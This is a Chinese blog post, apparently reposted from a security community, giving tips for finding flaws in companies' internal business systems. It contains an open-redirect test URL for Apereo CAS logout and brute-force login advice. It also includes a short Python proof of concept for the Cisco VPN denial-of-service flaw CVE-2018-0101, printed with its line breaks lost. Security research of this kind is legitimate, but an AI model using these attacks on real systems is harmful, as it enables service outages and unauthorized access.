在企业内部,为了方便员工无纸化办公及审批流程上的电子化需求,都建设了不少的IT业务系统,这些内部业务系统因为只有公司内部员工才能使用,所以可以从这些地方下手进行漏洞的挖掘。
在挖掘之前首先我们要搞清楚在企业的内网中,建设的业务系统有哪些,是自己建立的还是采用第三方厂商的系统,如果是自己建立的系统,则挖掘漏洞的难度较大;而如果使用第三方公司的业务系统,就会相对来说好操作一点,根据我挖掘漏洞的经验,大概总结出这些:
如果没有二次验证可以尝试进行爆破登录,但是如果有二次验证就不行了
例如,某处API越权:
未授权访问:
Apereo CAS的Logout任意URL跳转漏洞,这个要看企业有没有做验证,如果没有做验证的话可以尝试
例如 https://example.com/sso/logout?service=https://www.baidu.com
登出时的服务域名设置为百度进行尝试看是否可以跳转
通过VPN成功撕入某厂商内网:
又或者拒绝服务漏洞,比如:Cisco VPN的拒绝服务漏洞CVE-2018-0101。对应PoC:
import requestsimport sysimport urllib3headers = {}headers['User-Agent'] = 'Open AnyConnect VPN Agent v7.08-265-gae481214-dirty'headers['Content-Type'] = 'application/x-www-form-urlencoded'headers['X-Aggregate-Auth'] = '1'headers['X-Transcend-Version'] = '1'headers['Accept-Encoding'] = 'identity'headers['Accept'] = '*/*'headers['X-AnyConnect-Platform'] = 'linux-64'headers['X-Support-HTTP-Auth'] = 'false'xml = """<?xml version="1.0" encoding="UTF-8"?><config-auth client="a" type="a" aggregate-auth-version="a"> <host-scan-reply>A</host-scan-reply></config-auth>"""r = requests.post(sys.argv[1], data = xml, headers = headers, verify=False, allow_redirects=False)
转自先知社区
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.